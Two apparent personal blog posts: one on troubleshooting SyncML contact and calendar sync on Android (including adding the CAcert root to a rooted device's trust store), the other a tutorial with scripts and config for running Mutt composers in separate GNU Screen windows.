Besides the hell imposed on the unlucky ones trying to compile
android-client
for themselves instead of using the Market version, there
were
various
compatibility
issues.
In addition to that, SSL verification is only possible using the certificates
already stored in the system. Neither self-signed nor community-signed SSL
connections are possible.
If you have root permissions, there is a workaround to add CAcert:
# adb pull /system/etc/security/cacerts.bks .
# keytool -keystore cacerts.bks -storetype BKS -provider org.bouncycastle.jce.provider.BouncyCastleProvider -storepass changeit -import -v -trustcacerts -alias cacert_org_class_3 -file cacert_class3.crt
Certificate was added to keystore
[Storing cacerts.bks]
# adb remount
remount succeeded
# adb push cacerts.bks /system/etc/security/cacerts.bks
Nevertheless, the experience was so frustrating that I started my own project to improve SSL certificate management on Android.
After many fruitless attempts at getting reproducible synchronization with Funambol's Android client, I decided to test Synthesis. It installed, allowed me to bypass SSL certificate checking (which is not quite perfect, but at least better than no SSL at all) and synced all my contacts at first attempt. Wow! Considering the time I have put into Funambol, paying 18€ for a Synthesis license really looks inexpensive in hindsight.
However, not everything is as shiny as it looks at first. It seems, Synthesis is not providing its own calendar backend. Instead, it is using whatever is available on the device. My device however seems to be lacking any calendar providers, unless I install the Funambol client. So all in all, I am using Synthesis to synchronize events to the Funambol calendar because Funambol fails at it. Funny, isn't it?
Update: After upgrading eGroupWare to 1.8.001, I can actually synchronize my events to my Android using Funambol. Because they change much more often than my contacts, I might actually stick to this software for some more time without buying Synthesis...
Update, 2011-05-15: I finally found the "bug" responsible for my lack of
contacts synchronization. I happened to have a contact with an "&" sign, which
was transmitted verbatim by eGroupWare, freaking out the Funambol parser.
After renaming the contact, life suddenly became great passable!
Conclusion
SyncML is a friggin' huge pile of shi bloat. Just sync your
devices to Google and your experience will be great.
As a long-time Mutt user I always looked with envy at you Thunderbird and Kmail and what-not fans, as you could spawn new windows for reading and writing e-mails with a mere click (or sometimes a double-click).
It was just too bothersome to have $EDITOR
block my inbox until I finish
writing or give up and postpone the mail, losing track. As I am using
Screen to run Mutt anyway, it
seemed like a logical step to make it spawn new screen windows for writing mails
and opening other mailboxes. The problem of multiplexing Mutt seems to have
appeared to other
people
before as well, however the solution is not quite easy to spot.
The Idea Behind Mutt Multiplexing
The suggestion for people like me is: replace editor
with a command line that
spawns a new terminal and opens up mutt -H
on a copy of the temp file. The
original mutt will then see that the message was not changed and drop it
silently, while the new instance allows editing.
Fortunately, you can call screen
from inside screen
, thus creating a new
window, so project mutt-screen was born! Unfortunately, not everything was as
easy as expected.
The Gory Details, version 1
So, to make the whole thing better manageable, lets split that
editor
setting line into two parts: a script that is called in the new screen
window and what needs to be done in the original mutt instance.
Lets call the script ~/bin/mutt-compose.sh
:
#!/bin/sh
mutt -H "$1"
rm "$1"
Now, lets make a copy of the mail draft (%s
), and run the composer in a new
screen window:
# edit messages in a new screen window
set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"
unset wait_key
Great! We did it! Oh wait, no! It's a fork bomb! The new composer of course
evaluates editor
and launches... another copy of itself.
Edit the editor
, version 2
Consequently, we need to override editor
for the editing instance.
Because we need to prevent the new Mutt from inserting a second .sig
and
more headers, lets create a second config file. Then we can call mutt -P
~/.mutt_compose -H "$1"
from the script, with ~/.mutt_compose
containing:
# read main config
source ~/.muttrc
# remove hooks, headers and sig, they are already in the draft
unhook send-hook
unset signature
unmy_hdr *
# call the right editor immediately
set autoedit=yes
set editor="vim +'set tw=72' +/^$/+1"
But now its going to work, isn't it? Not quite - something happened to postponed messages! Why are there now two edit windows? It seems, Mutt has a different code-path for messages which have been edited already. Here, the first instance ignores that the message was not edited and falls through to the compose window, while the second instance runs the editor (and permanently deletes the message if you do not explicitly save it, oops!).
Forking the editor - or not? Version 3
Our forking-out of the editor causes problems in three cases, as it seems:
<recall-message>
, <edit>
and <resend-message>
/<forward-message>
. The
former can be worked around by using a custom macro:
# override the <recall-message> hotkey
macro index,pager R "<shell-escape>screen -t postponed mutt -F ~/.mutt/compose -p<enter>"
# prevent recall on <mail>
set recall=no
This comes at the additional discomfort of not being asked if you want to resume
writing your last mail when pressing m
. That might be possible to achieve with
some workaround - feel free to leave a comment if you find one.
For <edit>
, the only viable workaround seems to be resetting editor
to its
former state, editing the message in-place and setting editor
back to the
screen call. Inconvenient, blocking your main Mutt, but possible.
# bonus points for outsourcing the two different editor settings into their own
# source'able one-liners...
macro index,pager e '<enter-command>set editor="vim +set\ tw=72 +/^$/+1"<enter><edit><enter-command>set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"<enter>'
With <resend-message>
/<forward-message>
, there is no workaround. I tried pushing keys into the
buffer to quit the compose window, changing relevant settings, making blood
sacrifices to various gods, all without success. So far I have to live with
manually quitting the first composer and editing the message in the second one.
Yikes.
The resulting config, version 4 (final)
When we put everything together, the following settings files should be in place.
~/.muttrc
# do not forget your own settings...
# edit messages in a new screen window
set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"
unset wait_key
# override the <recall-message> hotkey
macro index,pager R "<shell-escape>screen -t postponed mutt -F ~/.mutt/compose -p<enter>"
# prevent recall on <mail>
set recall=no
# set the editor for for editing messages in-place
macro index,pager e '<enter-command>set editor="vim +set\ tw=72 +/^$/+1"<enter><edit><enter-command>set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"<enter>'
# open mailbox listing in a new window
macro index,pager y "<shell-escape>screen -t mboxes mutt -y<enter>"
~/bin/mutt-compose.sh
#!/bin/sh
# set the screen window title to the message receiver
awk -F 'To: ' '/^To:/ { print "\033k" $2 "\033\\" }' "$1"
mutt -F ~/.mutt_compose -H "$1"
rm "$1"
~/.mutt_compose
# read main config
source ~/.muttrc
# remove hooks, headers and sig, they are already in the draft
unhook send-hook
unset signature
unmy_hdr *
# call the right editor immediately
set autoedit=yes
set editor="vim +'set tw=72' +/^$/+1"
The following .screenrc.mutt
file can be used to spawn a screen with your inbox
in it and a status bar showing the outsourced instances:
~/.screenrc.mutt
hardstatus alwayslastline "%-Lw%{=b BW} %50>%n%f* %t %{-}%+Lw%< "
sorendition = bG
vbell off
# start mutt directly in a window
screen -t INBOX mutt
Conclusion
This solution is not perfect. In certain corner cases (<resend-message>
) it
just does not behave. In other situations (caching the PGP passphrase does not
work) it has less comfort. Nevertheless, it has increased my Mutt productivity
and decreased my frustration a lot. Now all is missing is clean support for
multiple profiles (read: without having many scripts bound to clumsy keyboard
shortcuts) and proper in-mutt mechanism for message tags.